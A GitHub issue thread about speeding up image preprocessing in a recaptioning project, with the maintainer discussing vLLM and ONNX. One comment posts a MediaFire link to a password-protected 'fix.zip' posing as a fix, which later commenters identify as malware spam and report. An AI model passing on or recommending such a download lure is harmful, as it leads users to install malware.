### ISSUE TITLE
Optimization in the preprocessing file (minor: increase in image processing speed)

### ISSUE THREAD

**Issue by Sangrish-braincade** [sayakpaul/simple-image-recaptioning#2]
Hi there! I've been looking at your codebase and I think I've identified some areas where performance could potentially be improved. I'm not entirely familiar with your project's workflow or preferred methods for contributions, so I thought I'd raise these as suggestions in an issue. Let me know what you think, very open to suggestions on this:-

According to me, current image processing pipeline in `preprocess_fn` has room for improvement in terms of performance.
Methods we can potentially implement:
1. Convert PIL Images to NumPy arrays early in the process for faster manipulations.
2. Reuse BytesIO objects to reduce memory allocations. in pil_to_bytes function.
3. Shifting CPU related tasks thru torch.multiprocessing

Questions:
1. Were there any demerits to pushing the watermark model to GPU?

I am not sure what the preferred method to raise a PR is, hence raising this issue. Do let me know if there are any guidelines will raise the PR shortly after!

**Comment by SagarChandra07** [comment]
try this
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by sayakpaul** [comment]
@SagarChandra07 what is that?

@Sangrish-braincade 

> Convert PIL Images to NumPy arrays early in the process for faster manipulations.

Have you tried this with VLLM which is what we used for recaptioning? 

> Reuse BytesIO objects to reduce memory allocations. in pil_to_bytes function.

Yeah this is good. Feel free to open a PR to contribute this. 

> Shifting CPU related tasks thru torch.multiprocessing

Where exactly? We are already parallelizing the workload quite a bit by specifying 
https://github.com/sayakpaul/simple-image-recaptioning/blob/85b3d2061b253bba5798e825a2a3c52b4ae8f4b8/main.py#L16

And the artifact serialization happens in multiple threads already. 

> Were there any demerits to pushing the watermark model to GPU?

I am not sure how this would play with `vllm` and distributed computing I want to achieve with it. Basically, I want to keep the GPUs busy entirely for recaptioning and offload data processing stuff to CPU. In order to achieve an optimal performance on CPU, I leveraged `onnx`.  I think all of this is covered in the REAMDE already.

**Comment by Sangrish-braincade** [comment]
@SagarChandra07 Will explore, would love to know where it would help before doing so

@sayakpaul Misunderstood the README, reread it again. That makes sense! Ill open a PR for for the pil func and reach out to once i implement the first part with VLLM arch

Will close this issue now!

**Comment by thelabcat** [comment]
> @SagarChandra07 Will explore, would love to know where it would help before doing so

Do not run that file! It is malware. The account has been spamming links to it all over GitHub. They use a password protected zip archive to evade the auto-check by MediaFire. I extracted it on a non-Windows machine and checked it manually. 17 positives. Been searching through their comments and warning people.

**Comment by sayakpaul** [comment]
@thelabcat thanks for letting me know. I just reported the content.
